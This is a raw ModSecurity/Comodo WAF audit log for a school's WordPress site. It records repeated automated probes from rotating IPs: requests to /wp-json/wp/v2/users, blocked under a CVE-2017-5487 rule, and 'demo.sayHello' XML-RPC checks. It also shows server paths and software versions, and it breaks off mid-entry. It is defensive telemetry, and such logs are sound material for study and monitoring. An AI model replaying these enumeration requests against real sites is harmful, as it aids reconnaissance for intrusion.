"TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494689989400 6633 (- - -) Stopwatch2: 1747494689989400 6633; combined=4945, p1=634, p2=4066, p3=39, p4=42, p5=98, sr=94, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e28b077b-Z-- --309ba72e-A-- [17/May/2025:22:12:02 +0700] aCinQgTOsBn9MSWb6WLKLQAAAIQ 103.236.140.4 36420 103.236.140.4 8181 --309ba72e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --309ba72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --309ba72e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494722537581 2829 (- - -) Stopwatch2: 1747494722537581 2829; combined=1273, p1=415, p2=828, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --309ba72e-Z-- --3d8b1d10-A-- [17/May/2025:22:12:10 +0700] aCinSgTOsBn9MSWb6WLKQQAAAIg 103.236.140.4 36576 103.236.140.4 8181 --3d8b1d10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.176 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d8b1d10-C-- demo.sayHello --3d8b1d10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d8b1d10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494730283462 6030 (- - -) Stopwatch2: 1747494730283462 6030; combined=4722, p1=573, p2=3908, p3=44, p4=41, p5=94, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8b1d10-Z-- --c901110b-A-- [17/May/2025:22:13:54 +0700] aCinsum4kjNN-hEbWjKb3wAAAEo 103.236.140.4 38488 103.236.140.4 8181 --c901110b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c901110b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c901110b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494834044377 2617 (- - -) Stopwatch2: 1747494834044377 2617; combined=1137, p1=376, p2=731, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c901110b-Z-- --29874a27-A-- [17/May/2025:22:14:05 +0700] aCinvem4kjNN-hEbWjKb5wAAAEc 103.236.140.4 38674 103.236.140.4 8181 --29874a27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29874a27-C-- demo.sayHello --29874a27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29874a27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494845093233 5396 (- - -) Stopwatch2: 1747494845093233 5396; combined=4021, p1=471, p2=3194, p3=33, p4=34, p5=158, sr=63, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29874a27-Z-- --13f3d152-A-- [17/May/2025:22:14:32 +0700] aCin2BKi5m5upc8uMd4NNwAAANg 103.236.140.4 39154 103.236.140.4 8181 --13f3d152-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13f3d152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13f3d152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494872996794 2283 (- - -) Stopwatch2: 1747494872996794 2283; combined=1066, p1=345, p2=698, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f3d152-Z-- --24ca776b-A-- [17/May/2025:22:14:38 +0700] aCin3hKi5m5upc8uMd4NOgAAAMo 103.236.140.4 39258 103.236.140.4 8181 --24ca776b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --24ca776b-C-- demo.sayHello --24ca776b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --24ca776b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494878497045 5554 (- - -) Stopwatch2: 1747494878497045 5554; combined=4331, p1=578, p2=3408, p3=33, p4=34, p5=153, sr=137, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24ca776b-Z-- --b89ddd3b-A-- [17/May/2025:22:15:37 +0700] aCioGQTOsBn9MSWb6WLL6wAAAIk 103.236.140.4 40334 103.236.140.4 8181 --b89ddd3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b89ddd3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b89ddd3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494937075232 3028 (- - -) Stopwatch2: 1747494937075232 3028; combined=1460, p1=443, p2=968, p3=0, p4=0, p5=49, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b89ddd3b-Z-- --ac492757-A-- [17/May/2025:22:15:46 +0700] aCioInyxdQCiyU1ENFeZeQAAABQ 103.236.140.4 40530 103.236.140.4 8181 --ac492757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac492757-C-- demo.sayHello --ac492757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac492757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494946193375 5302 (- - -) Stopwatch2: 1747494946193375 5302; combined=3983, p1=489, p2=3279, p3=30, p4=34, p5=90, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac492757-Z-- --31a8c61c-A-- [17/May/2025:22:16:37 +0700] aCioVXyxdQCiyU1ENFeZuQAAAAw 103.236.140.4 41382 103.236.140.4 8181 --31a8c61c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31a8c61c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a8c61c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494997482987 2903 (- - -) Stopwatch2: 1747494997482987 2903; combined=1385, p1=429, p2=913, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a8c61c-Z-- --5970f565-A-- [17/May/2025:22:16:45 +0700] aCioXRKi5m5upc8uMd4NzQAAANc 103.236.140.4 41510 103.236.140.4 8181 --5970f565-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5970f565-C-- demo.sayHello --5970f565-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5970f565-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495005432694 6006 (- - -) Stopwatch2: 1747495005432694 6006; combined=4356, p1=547, p2=3569, p3=32, p4=36, p5=101, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5970f565-Z-- --fefbc923-A-- [17/May/2025:22:21:16 +0700] aCipbHyxdQCiyU1ENFebEQAAAA0 103.236.140.4 46254 103.236.140.4 8181 --fefbc923-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fefbc923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefbc923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495276853658 2398 (- - -) Stopwatch2: 1747495276853658 2398; combined=1101, p1=367, p2=708, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefbc923-Z-- --4573a510-A-- [17/May/2025:22:21:26 +0700] aCipdnyxdQCiyU1ENFebGwAAAAY 103.236.140.4 46434 103.236.140.4 8181 --4573a510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4573a510-C-- demo.sayHello --4573a510-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4573a510-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495286913281 5787 (- - -) Stopwatch2: 1747495286913281 5787; combined=4311, p1=535, p2=3552, p3=35, p4=36, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4573a510-Z-- --287f4019-A-- [17/May/2025:22:22:38 +0700] aCipvhKi5m5upc8uMd4PlgAAAMg 103.236.140.4 47698 103.236.140.4 8181 --287f4019-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --287f4019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --287f4019-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495358049803 2585 (- - -) Stopwatch2: 1747495358049803 2585; combined=1178, p1=408, p2=741, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --287f4019-Z-- --b4eb7f13-A-- [17/May/2025:22:22:45 +0700] aCipxRKi5m5upc8uMd4PsgAAAMI 103.236.140.4 47846 103.236.140.4 8181 --b4eb7f13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4eb7f13-C-- demo.sayHello --b4eb7f13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4eb7f13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495365283535 16453 (- - -) Stopwatch2: 1747495365283535 16453; combined=26078, p1=538, p2=3222, p3=33, p4=34, p5=11139, sr=71, sw=62, l=0, gc=11050 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4eb7f13-Z-- --e83ce00f-A-- [17/May/2025:22:23:14 +0700] aCip4nyxdQCiyU1ENFebcQAAAAU 103.236.140.4 48338 103.236.140.4 8181 --e83ce00f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e83ce00f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83ce00f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495394597835 2358 (- - -) Stopwatch2: 1747495394597835 2358; combined=1048, p1=344, p2=680, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83ce00f-Z-- --a9bbcd36-A-- [17/May/2025:22:23:21 +0700] aCip6RKi5m5upc8uMd4P_QAAAMs 103.236.140.4 48458 103.236.140.4 8181 --a9bbcd36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9bbcd36-C-- demo.sayHello --a9bbcd36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bbcd36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495401920266 5901 (- - -) Stopwatch2: 1747495401920266 5901; combined=4404, p1=529, p2=3633, p3=38, p4=36, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bbcd36-Z-- --1bdf6778-A-- [17/May/2025:22:24:12 +0700] aCiqHHyxdQCiyU1ENFebowAAABg 103.236.140.4 49346 103.236.140.4 8181 --1bdf6778-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) 